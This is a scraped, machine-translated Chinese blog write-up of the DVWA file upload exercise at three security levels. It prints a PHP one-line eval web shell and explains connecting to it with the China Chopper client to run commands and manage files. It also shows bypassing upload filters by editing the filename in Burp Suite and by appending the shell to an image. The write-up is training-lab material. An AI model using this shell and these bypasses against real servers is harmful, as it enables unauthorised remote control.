当前位置:网站首页>DVWA exercise 05 file upload file upload
DVWA exercise 05 file upload file upload
2022-07-06 14:47:00 【Fuki is on the way】
Purpose IP:192.168.142.133
Local IP:192.168.142.134
1.Security Level:Low
The code is as follows
The server did not check and process the uploaded files . I try to create a new one locally muma.php, Write a word Trojan :<?php @eval($_POST['test']);?>
( Pay attention to punctuation in English )
Upload files to dvwa
Return the path where the file was uploaded !
Go to the corresponding folder to find the file
Before connecting with a Chinese kitchen knife , There is a question . The new version of the phpstudy By default php7, Chinese kitchen knife connection failed , Switch to php5 That's it .( After changing the version , my dvwa Something went wrong , I had to repack it )
Open the Chinese kitchen knife , Right click , add to .
Address to fill in http://192.168.142.133/dvwa/hackable/uploads/muma.php
On the right is a sentence in single quotation marks
Script type selection PHP(Eval)
Right click , Virtual terminal
Input ipconfig, Check address information , But the display failed .
The target virtual machine is installed 360, A warning window will pop up when entering the system command , Default block .
hold 360 Turn it off and try again , Command executed successfully !
You can also use the file management function , View the files of the entire virtual machine , At the same time, it can upload / download / Delete and other operations .
2.Security Level:Medium
Key source code :
The upload file type restricted here is image, extension jpeg or png, And the size is smaller than 100000 byte . We can use burpsuite Modify after interception , Bypass restrictions .
Local muma.php Rename it to muma2.png
Click upload ,Burpsuite Intercept the packet , Put the filename muma2.png It is amended as follows muma2.php, Then release .
Go to the target virtual machine to view muma2.php Successfully uploaded !
3.Security Level:High
The key source code is as follows :
strrpos(string,find,start) Function return string find In another string string The last place in , If no string is found, return false, Optional parameters start Specify where to start the search .
getimagesize(string filename) The function will read the file header , Returns the length of the picture 、 Wide and so on , If there is no relevant picture file header , The function will report an error . You can see ,High Level code reads the last in the file name ”.” String after , Expect to restrict file types by file names , Therefore, the upload file name must be in the form of ”*.jpg”、”*.jpeg” 、”*.png” One of . meanwhile ,getimagesize The function also limits that the file header of the uploaded file must be of image type .
Splice a picture with the previous sentence Trojan horse file , Form a new picture .
Open the picture with Notepad , You can see a sentence at the end of the Trojan horse .
Upload succeeded , But it can't be connected with a kitchen knife . I didn't think of a solution for the time being .
Reference resources :https://www.cnblogs.com/N0r4h/p/12257848.html
https://blog.csdn.net/weixin_39190897/article/details/86772765
边栏推荐
- Markdown font color editing teaching
- Wang Shuang's detailed notes on assembly language learning I: basic knowledge
- 函数:用牛顿迭代法求方程的根
- Transplant hummingbird e203 core to Da Vinci pro35t [Jichuang xinlai risc-v Cup] (I)
- Matplotlib绘图快速入门
- Keil5-MDK的格式化代码工具及添加快捷方式
- Statistics 8th Edition Jia Junping Chapter 2 after class exercises and answer summary
- MySQL中什么是索引?常用的索引有哪些种类?索引在什么情况下会失效?
- Load balancing ribbon of microservices
- 刷视频的功夫,不如看看这些面试题你掌握了没有,慢慢积累月入过万不是梦。
猜你喜欢
Summary of thread implementation
1. Payment system
Statistics 8th Edition Jia Junping Chapter 7 Summary of knowledge points and answers to exercises after class
内网渗透之内网信息收集(三)
ES全文索引
Fundamentals of digital circuits (II) logic algebra
5 minutes to master machine learning iris logical regression classification
Markdown font color editing teaching
Apache APIs IX has the risk of rewriting the x-real-ip header (cve-2022-24112)
Wang Shuang's detailed learning notes of assembly language II: registers
随机推荐
5 minutes to master machine learning iris logical regression classification
Always of SystemVerilog usage_ comb 、always_ iff
函数:求1-1/2+1/3-1/4+1/5-1/6+1/7-…+1/n
Network technology related topics
Keil5-MDK的格式化代码工具及添加快捷方式
Keil5 MDK's formatting code tool and adding shortcuts
函数:求两个正数的最大公约数和最小公倍
王爽汇编语言详细学习笔记二:寄存器
Numpy Quick Start Guide
Statistics 8th Edition Jia Junping Chapter 7 Summary of knowledge points and answers to exercises after class
The salary of testers is polarized. How to become an automated test with a monthly salary of 20K?
《统计学》第八版贾俊平第十一章一元线性回归知识点总结及课后习题答案
关于交换a和b的值的四种方法
四元数---基本概念(转载)
Apache APIs IX has the risk of rewriting the x-real-ip header (cve-2022-24112)
flask实现强制登陆
《统计学》第八版贾俊平第二章课后习题及答案总结
Pointeurs: maximum, minimum et moyenne
函数:用牛顿迭代法求方程的根
My first blog